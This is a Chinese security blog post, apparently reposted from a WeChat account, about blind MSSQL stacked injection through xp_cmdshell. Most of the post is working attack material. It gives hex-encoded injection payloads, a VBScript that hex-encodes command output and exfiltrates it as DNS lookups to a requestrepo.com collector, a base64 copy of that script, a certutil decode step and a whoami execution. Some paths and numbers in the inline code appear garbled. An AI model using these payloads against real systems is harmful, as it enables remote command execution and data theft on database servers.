MSSQL注入xp_cmdshell无回显的一些研究

admin
admin
admin
139580
文章
114
评论
2025年1月1日11:45:16评论20 views字数 17095阅读56分59秒阅读模式
0x00 前言
    最近攻防遇到一个mssql堆叠注入,能执行命令,但是无法回显,也不出网(可dnslog),于是就想通过dnslog来将我们命令执行的数据带出来(web路径),方便写shell或者执行其它操作
0x01 思路
    我们可以将我们命令执行的结果,写入到一个文件中,然后使用vbs脚本,读取文本内容,将结果进行hex进行编码;dnslog每段能接受63个字符,那么我们可以每次传递180个字符(如果长度不够,补0),然后加上请求标识,对数据进行分段传输。执行方式大概如下:
ping -n 1 random.1.part1.part2.part3.dnslog.cnping -n 1 random.2.part1.part2.part3.dnslog.cnping -n 1 random.3.part1.part2.part3.dnslog.cn

这样我们即可根据dnslog记录的请求,将参数进行拼接然后进行hex -> string,达到命令执行回显的目的,方便我们后续操作。

1、执行命令方式

DECLARE/**/@ypes/**/VARCHAR(8000);SET/**/@ypes=0x77686f616d69;EXEC/**/master..xp_cmdshell/**/@ypes--

2、vbs脚本

Function ReadFile(filePath)    Dim fso, file, fileContentSet fso = CreateObject("Scripting.FileSystemObject")On Error Resume NextSet file = fso.OpenTextFile(filePath, 1)    If Err.Number <>0Then        ReadFile = ""        Exit FunctionEnd If    fileContent = file.ReadAll()    file.Close()    ReadFile = fileContentEndFunctionFunction ToHex(inputStr)    Dim i, hexStr    hexStr = ""For i =1To Len(inputStr)        hexStr = hexStr &Right("00" & Hex(Asc(Mid(inputStr, i, 1))), 2)    Next    ToHex = hexStrEndFunctionFunction GenerateRandomNumber()    Randomize    GenerateRandomNumber =Int((99999-10000+1* Rnd +10000)EndFunctionSub PingDnslog(hexStr, randomNum)    Dim i, segment, part1, part2, part3, counter, paddedSegment    i =1    counter =0    Do While i <= Len(hexStr)        segment = Mid(hexStr, i, 180)' Pad the segment with zeros if it's less than 180 characters        If Len(segment) <180Then            paddedSegment = segment & String(180- Len(segment), "0")Else            paddedSegment = segmentEnd If        part1 = Mid(paddedSegment, 160)        part2 = Mid(paddedSegment, 6160)        part3 = Mid(paddedSegment, 12160)' Increment counter for each ping        counter = counter + 1        ' Construct the DNS request        dnsRequest = randomNum & "." & counter & "." & part1 & "." & part2 & "." & part3 & ".gwv7n1f1.requestrepo.com"' Ping the constructed DNS request        CreateObject("WScript.Shell").Run "ping -n 1 " & dnsRequest, 0, True        i = i + 180    LoopEnd Sub' Main script logicDim filePath, fileContent, hexResult, randomNumfilePath = "C:UsersPublicfile.txt"fileContent = ReadFile(filePath)If fileContent = "" Then    WScript.Echo "Failed to read file or file is empty."    WScript.Quit 1End IfhexResult = ToHex(fileContent)randomNum = GenerateRandomNumber()PingDnslog hexResult, randomNum

3、脚本写入

先将内容Base64编码,然后进行文件写入

echo RnVuY3Rpb24gUmVhZEZpbGUoZmlsZVBhdGgpCiAgICBEaW0gZnNvLCBmaWxlLCBmaWxlQ29udGVudAogICAgU2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQogICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIFNldCBmaWxlID0gZnNvLk9wZW5UZXh0RmlsZShmaWxlUGF0aCwgMSkKICAgIElmIEVyci5OdW1iZXIgPD4gMCBUaGVuCiAgICAgICAgUmVhZEZpbGUgPSAiIgogICAgICAgIEV4aXQgRnVuY3Rpb24KICAgIEVuZCBJZgogICAgZmlsZUNvbnRlbnQgPSBmaWxlLlJlYWRBbGwoKQogICAgZmlsZS5DbG9zZSgpCiAgICBSZWFkRmlsZSA9IGZpbGVDb250ZW50CkVuZCBGdW5jdGlvbgoKRnVuY3Rpb24gVG9IZXgoaW5wdXRTdHIpCiAgICBEaW0gaSwgaGV4U3RyCiAgICBoZXhTdHIgPSAiIgogICAgRm9yIGkgPSAxIFRvIExlbihpbnB1dFN0cikKICAgICAgICBoZXhTdHIgPSBoZXhTdHIgJiBSaWdodCgiMDAiICYgSGV4KEFzYyhNaWQoaW5wdXRTdHIsIGksIDEpKSksIDIpCiAgICBOZXh0CiAgICBUb0hleCA9IGhleFN0cgpFbmQgRnVuY3Rpb24KCkZ1bmN0aW9uIEdlbmVyYXRlUmFuZG9tTnVtYmVyKCkKICAgIFJhbmRvbWl6ZQogICAgR2VuZXJhdGVSYW5kb21OdW1iZXIgPSBJbnQoKDk5OTk5IC0gMTAwMDAgKyAxKSAqIFJuZCArIDEwMDAwKQpFbmQgRnVuY3Rpb24KClN1YiBQaW5nRG5zbG9nKGhleFN0ciwgcmFuZG9tTnVtKQogICAgRGltIGksIHNlZ21lbnQsIHBhcnQxLCBwYXJ0MiwgcGFydDMsIGNvdW50ZXIsIHBhZGRlZFNlZ21lbnQKICAgIGkgPSAxCiAgICBjb3VudGVyID0gMAogICAgRG8gV2hpbGUgaSA8PSBMZW4oaGV4U3RyKQogICAgICAgIHNlZ21lbnQgPSBNaWQoaGV4U3RyLCBpLCAxODApCiAgICAgICAgCiAgICAgICAgJyBQYWQgdGhlIHNlZ21lbnQgd2l0aCB6ZXJvcyBpZiBpdCdzIGxlc3MgdGhhbiAxODAgY2hhcmFjdGVycwogICAgICAgIElmIExlbihzZWdtZW50KSA8IDE4MCBUaGVuCiAgICAgICAgICAgIHBhZGRlZFNlZ21lbnQgPSBzZWdtZW50ICYgU3RyaW5nKDE4MCAtIExlbihzZWdtZW50KSwgIjAiKQogICAgICAgIEVsc2UKICAgICAgICAgICAgcGFkZGVkU2VnbWVudCA9IHNlZ21lbnQKICAgICAgICBFbmQgSWYKICAgICAgICAKICAgICAgICBwYXJ0MSA9IE1pZChwYWRkZWRTZWdtZW50LCAxLCA2MCkKICAgICAgICBwYXJ0MiA9IE1pZChwYWRkZWRTZWdtZW50LCA2MSwgNjApCiAgICAgICAgcGFydDMgPSBNaWQocGFkZGVkU2VnbWVudCwgMTIxLCA2MCkKICAgICAgICAKICAgICAgICAnIEluY3JlbWVudCBjb3VudGVyIGZvciBlYWNoIHBpbmcKICAgICAgICBjb3VudGVyID0gY291bnRlciArIDEKICAgICAgICAKICAgICAgICAnIENvbnN0cnVjdCB0aGUgRE5TIHJlcXVlc3QKICAgICAgICBkbnNSZXF1ZXN0ID0gcmFuZG9tTnVtICYgIi4iICYgY291bnRlciAmICIuIiAmIHBhcnQxICYgIi4iICYgcGFydDIgJiAiLiIgJiBwYXJ0MyAmICIuZ3d2N24xZjEucmVxdWVzdHJlcG8uY29tIgogICAgICAgIAogICAgICAgICcgUGluZyB0aGUgY29uc3RydWN0ZWQgRE5TIHJlcXVlc3QKICAgICAgICBDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gInBpbmcgLW4gMSAiICYgZG5zUmVxdWVzdCwgMCwgVHJ1ZQogICAgICAgIAogICAgICAgIGkgPSBpICsgMTgwCiAgICBMb29wCkVuZCBTdWIKCicgTWFpbiBzY3JpcHQgbG9naWMKRGltIGZpbGVQYXRoLCBmaWxlQ29udGVudCwgaGV4UmVzdWx0LCByYW5kb21OdW0KCmZpbGVQYXRoID0gIkM6XFVzZXJzXFB1YmxpY1xmaWxlLnR4dCIKZmlsZUNvbnRlbnQgPSBSZWFkRmlsZShmaWxlUGF0aCkKCklmIGZpbGVDb250ZW50ID0gIiIgVGhlbgogICAgV1NjcmlwdC5FY2hvICJGYWlsZWQgdG8gcmVhZCBmaWxlIG9yIGZpbGUgaXMgZW1wdHkuIgogICAgV1NjcmlwdC5RdWl0IDEKRW5kIElmCgpoZXhSZXN1bHQgPSBUb0hleChmaWxlQ29udGVudCkKcmFuZG9tTnVtID0gR2VuZXJhdGVSYW5kb21OdW1iZXIoKQoKUGluZ0Ruc2xvZyBoZXhSZXN1bHQsIHJhbmRvbU51bQ== > C:UsersPublictest.txt

写入txt

DECLARE/**/@ypes/**/VARCHAR(8000);SET/**/@ypes=0x6563686f20526e56755933527062323467556d56685a455a706247556f5a6d6c735a564268644767704369416749434245615730675a6e4e764c43426d6157786c4c43426d6157786c513239756447567564416f67494341675532563049475a7a6279413949454e795a5746305a553969616d566a6443676955324e79615842306157356e4c6b5a706247565465584e305a573150596d706c593351694b516f67494341675432346752584a7962334967556d567a6457316c4945356c6548514b4943416749464e6c6443426d6157786c494430675a6e4e764c6b39775a5735555a586830526d6c735a53686d6157786c55474630614377674d536b4b4943416749456c6d494556796369354f645731695a584967504434674d43425561475675436941674943416749434167556d56685a455a70624755675053416949676f6749434167494341674945563461585167526e5675593352706232344b49434167494556755a43424a5a676f67494341675a6d6c735a554e76626e526c626e51675053426d6157786c4c6c4a6c595752426247776f4b516f67494341675a6d6c735a5335446247397a5a53677043694167494342535a57466b526d6c735a53413949475a7062475644623235305a573530436b56755a4342476457356a64476c7662676f4b526e56755933527062323467564739495a58676f615735776458525464484970436941674943424561573067615377676147563455335279436941674943426f5a586854644849675053416949676f6749434167526d397949476b6750534178494652764945786c62696870626e423164464e3063696b4b49434167494341674943426f5a586854644849675053426f5a586854644849674a6942536157646f644367694d44416949435967534756344b45467a5979684e6157516f61573577645852546448497349476b73494445704b536b7349444970436941674943424f5a58683043694167494342556230686c654341394947686c65464e3063677046626d5167526e5675593352706232344b436b5a31626d4e30615739754945646c626d56795958526c556d46755a473974546e5674596d56794b436b4b4943416749464a68626d527662576c365a516f6749434167523256755a584a68644756535957356b6232314f645731695a5849675053424a626e516f4b446b354f546b35494330674d5441774d4441674b7941784b53417149464a755a434172494445774d4441774b517046626d5167526e5675593352706232344b436c4e31596942516157356e5247357a6247396e4b47686c65464e3063697767636d46755a473974546e56744b516f674943416752476c7449476b7349484e6c5a32316c626e517349484268636e51784c43427759584a304d6977676347467964444d7349474e76645735305a584973494842685a47526c5a464e6c5a32316c626e514b4943416749476b6750534178436941674943426a6233567564475679494430674d416f6749434167524738675632687062475567615341385053424d5a57346f61475634553352794b516f67494341674943416749484e6c5a32316c626e51675053424e6157516f61475634553352794c4342704c4341784f4441704369416749434167494341674369416749434167494341674a794251595751676447686c49484e6c5a32316c626e516764326c30614342365a584a76637942705a6942706443647a4947786c63334d6764476868626941784f44416759326868636d466a6447567963776f67494341674943416749456c6d4945786c6269687a5a5764745a5735304b534138494445344d4342556147567543694167494341674943416749434167494842685a47526c5a464e6c5a32316c626e51675053427a5a5764745a57353049435967553352796157356e4b4445344d4341744945786c6269687a5a5764745a5735304b537767496a41694b516f674943416749434167494556736332554b494341674943416749434167494341676347466b5a47566b5532566e625756756443413949484e6c5a32316c626e514b494341674943416749434246626d51675357594b49434167494341674943414b49434167494341674943427759584a304d534139494531705a4368775957526b5a5752545a5764745a5735304c4341784c4341324d436b4b49434167494341674943427759584a304d694139494531705a4368775957526b5a5752545a5764745a5735304c4341324d5377674e6a41704369416749434167494341676347467964444d675053424e6157516f6347466b5a47566b5532566e62575675644377674d5449784c4341324d436b4b49434167494341674943414b49434167494341674943416e49456c7559334a6c625756756443426a623356756447567949475a766369426c59574e6f49484270626d634b49434167494341674943426a62335675644756794944306759323931626e526c636941724944454b49434167494341674943414b49434167494341674943416e49454e76626e4e30636e566a64434230614755675245355449484a6c6358566c6333514b49434167494341674943426b626e4e535a5846315a584e3049443067636d46755a473974546e567449435967496934694943596759323931626e526c6369416d494349754969416d49484268636e517849435967496934694943596763474679644449674a6941694c6949674a69427759584a304d79416d494349755a3364324e3234785a6a4575636d56786457567a64484a6c634738755932397449676f67494341674943416749416f6749434167494341674943636755476c755a79423061475567593239756333527964574e305a5751675245355449484a6c6358566c6333514b494341674943416749434244636d566864475650596d706c5933516f496c645459334a70634851755532686c624777694b53355364573467496e4270626d63674c5734674d534169494359675a47357a556d56786457567a644377674d43776756484a315a516f67494341674943416749416f67494341674943416749476b6750534270494373674d546777436941674943424d62323977436b56755a4342546457494b43696367545746706269427a59334a70634851676247396e61574d4b52476c7449475a70624756515958526f4c43426d6157786c51323975644756756443776761475634556d567a645778304c4342795957356b6232314f6457304b436d5a70624756515958526f49443067496b4d365846567a5a584a7a58464231596d78705931786d6157786c4c6e52346443494b5a6d6c735a554e76626e526c626e5167505342535a57466b526d6c735a53686d6157786c5547463061436b4b436b6c6d49475a7062475644623235305a57353049443067496949675647686c62676f674943416756314e6a636d6c77644335465932687649434a4759576c735a57516764473867636d56685a43426d6157786c4947397949475a706247556761584d675a57317764486b7549676f674943416756314e6a636d6c776443355264576c304944454b5257356b49456c6d4367706f5a5868535a584e3162485167505342556230686c6543686d6157786c513239756447567564436b4b636d46755a473974546e567449443067523256755a584a68644756535957356b6232314f645731695a58496f4b516f4b55476c755a305275633278765a79426f5a5868535a584e316248517349484a68626d52766255353162513d3d203e20433a5c55736572735c5075626c69635c746573742e747874;EXEC/**/master..xp_cmdshell/**/@ypes--

解密文件

certutil -decode C:UsersPublictest.txt C:UsersPublictest.vbs

VBS写入

DECLARE/**/@ypes/**/VARCHAR(8000);SET/**/@ypes=0x636572747574696c202d6465636f646520433a5c55736572735c5075626c69635c746573742e74787420433a5c55736572735c5075626c69635c746573742e766273;EXEC/**/master..xp_cmdshell/**/@ypes--

0x02 利用方式

1、第一条命令

DECLARE/**/@ypes/**/VARCHAR(8000);SET/**/@ypes=0x6563686f20526e56755933527062323467556d56685a455a706247556f5a6d6c735a564268644767704369416749434245615730675a6e4e764c43426d6157786c4c43426d6157786c513239756447567564416f67494341675532563049475a7a6279413949454e795a5746305a553969616d566a6443676955324e79615842306157356e4c6b5a706247565465584e305a573150596d706c593351694b516f67494341675432346752584a7962334967556d567a6457316c4945356c6548514b4943416749464e6c6443426d6157786c494430675a6e4e764c6b39775a5735555a586830526d6c735a53686d6157786c55474630614377674d536b4b4943416749456c6d494556796369354f645731695a584967504434674d43425561475675436941674943416749434167556d56685a455a70624755675053416949676f6749434167494341674945563461585167526e5675593352706232344b49434167494556755a43424a5a676f67494341675a6d6c735a554e76626e526c626e51675053426d6157786c4c6c4a6c595752426247776f4b516f67494341675a6d6c735a5335446247397a5a53677043694167494342535a57466b526d6c735a53413949475a7062475644623235305a573530436b56755a4342476457356a64476c7662676f4b526e56755933527062323467564739495a58676f615735776458525464484970436941674943424561573067615377676147563455335279436941674943426f5a586854644849675053416949676f6749434167526d397949476b6750534178494652764945786c62696870626e423164464e3063696b4b49434167494341674943426f5a586854644849675053426f5a586854644849674a6942536157646f644367694d44416949435967534756344b45467a5979684e6157516f61573577645852546448497349476b73494445704b536b7349444970436941674943424f5a58683043694167494342556230686c654341394947686c65464e3063677046626d5167526e5675593352706232344b436b5a31626d4e30615739754945646c626d56795958526c556d46755a473974546e5674596d56794b436b4b4943416749464a68626d527662576c365a516f6749434167523256755a584a68644756535957356b6232314f645731695a5849675053424a626e516f4b446b354f546b35494330674d5441774d4441674b7941784b53417149464a755a434172494445774d4441774b517046626d5167526e5675593352706232344b436c4e31596942516157356e5247357a6247396e4b47686c65464e3063697767636d46755a473974546e56744b516f674943416752476c7449476b7349484e6c5a32316c626e517349484268636e51784c43427759584a304d6977676347467964444d7349474e76645735305a584973494842685a47526c5a464e6c5a32316c626e514b4943416749476b6750534178436941674943426a6233567564475679494430674d416f6749434167524738675632687062475567615341385053424d5a57346f61475634553352794b516f67494341674943416749484e6c5a32316c626e51675053424e6157516f61475634553352794c4342704c4341784f4441704369416749434167494341674369416749434167494341674a794251595751676447686c49484e6c5a32316c626e516764326c30614342365a584a76637942705a6942706443647a4947786c63334d6764476868626941784f44416759326868636d466a6447567963776f67494341674943416749456c6d4945786c6269687a5a5764745a5735304b534138494445344d4342556147567543694167494341674943416749434167494842685a47526c5a464e6c5a32316c626e51675053427a5a5764745a57353049435967553352796157356e4b4445344d4341744945786c6269687a5a5764745a5735304b537767496a41694b516f674943416749434167494556736332554b494341674943416749434167494341676347466b5a47566b5532566e625756756443413949484e6c5a32316c626e514b494341674943416749434246626d51675357594b49434167494341674943414b49434167494341674943427759584a304d534139494531705a4368775957526b5a5752545a5764745a5735304c4341784c4341324d436b4b49434167494341674943427759584a304d694139494531705a4368775957526b5a5752545a5764745a5735304c4341324d5377674e6a41704369416749434167494341676347467964444d675053424e6157516f6347466b5a47566b5532566e62575675644377674d5449784c4341324d436b4b49434167494341674943414b49434167494341674943416e49456c7559334a6c625756756443426a623356756447567949475a766369426c59574e6f49484270626d634b49434167494341674943426a62335675644756794944306759323931626e526c636941724944454b49434167494341674943414b49434167494341674943416e49454e76626e4e30636e566a64434230614755675245355449484a6c6358566c6333514b49434167494341674943426b626e4e535a5846315a584e3049443067636d46755a473974546e567449435967496934694943596759323931626e526c6369416d494349754969416d49484268636e517849435967496934694943596763474679644449674a6941694c6949674a69427759584a304d79416d494349755a3364324e3234785a6a4575636d56786457567a64484a6c634738755932397449676f67494341674943416749416f6749434167494341674943636755476c755a79423061475567593239756333527964574e305a5751675245355449484a6c6358566c6333514b494341674943416749434244636d566864475650596d706c5933516f496c645459334a70634851755532686c624777694b53355364573467496e4270626d63674c5734674d534169494359675a47357a556d56786457567a644377674d43776756484a315a516f67494341674943416749416f67494341674943416749476b6750534270494373674d546777436941674943424d62323977436b56755a4342546457494b43696367545746706269427a59334a70634851676247396e61574d4b52476c7449475a70624756515958526f4c43426d6157786c51323975644756756443776761475634556d567a645778304c4342795957356b6232314f6457304b436d5a70624756515958526f49443067496b4d365846567a5a584a7a58464231596d78705931786d6157786c4c6e52346443494b5a6d6c735a554e76626e526c626e5167505342535a57466b526d6c735a53686d6157786c5547463061436b4b436b6c6d49475a7062475644623235305a57353049443067496949675647686c62676f674943416756314e6a636d6c77644335465932687649434a4759576c735a57516764473867636d56685a43426d6157786c4947397949475a706247556761584d675a57317764486b7549676f674943416756314e6a636d6c776443355264576c304944454b5257356b49456c6d4367706f5a5868535a584e3162485167505342556230686c6543686d6157786c513239756447567564436b4b636d46755a473974546e567449443067523256755a584a68644756535957356b6232314f645731695a58496f4b516f4b55476c755a305275633278765a79426f5a5868535a584e316248517349484a68626d52766255353162513d3d203e20433a5c55736572735c5075626c69635c746573742e747874;EXEC/**/master..xp_cmdshell/**/@ypes--

2、第二条命令

DECLARE/**/@ypes/**/VARCHAR(8000);SET/**/@ypes=0x636572747574696c202d6465636f646520433a5c55736572735c5075626c69635c746573742e74787420433a5c55736572735c5075626c69635c746573742e766273;EXEC/**/master..xp_cmdshell/**/@ypes--

3、命令执行写入文件

执行的命令都写入这个文件,test.vbs会读取这个文件

whoami > C:UsersPublicfile.txt
DECLARE/**/@ypes/**/VARCHAR(8000);SET/**/@ypes=0x77686f616d69203e20433a5c55736572735c5075626c69635c66696c652e747874;EXEC/**/master..xp_cmdshell/**/@ypes--

4、回显

DECLARE/**/@ypes/**/VARCHAR(8000);SET/**/@ypes=0x433a5c55736572735c5075626c69635c746573742e766273;EXEC/**/master..xp_cmdshell/**/@ypes--
MSSQL注入xp_cmdshell无回显的一些研究

原文始发于微信公众号(小白安全):MSSQL注入xp_cmdshell无回显的一些研究

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月1日11:45:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSSQL注入xp_cmdshell无回显的一些研究https://cn-sec.com/archives/3578240.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息